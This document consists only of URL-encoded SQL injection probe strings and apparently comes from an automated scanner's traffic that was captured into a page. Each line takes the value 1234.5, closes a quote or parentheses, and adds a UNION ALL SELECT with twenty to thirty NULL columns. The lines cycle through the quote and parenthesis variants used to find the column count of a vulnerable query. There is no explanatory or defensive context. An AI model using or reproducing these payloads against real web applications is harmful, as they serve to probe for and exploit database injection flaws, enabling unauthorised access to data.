1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 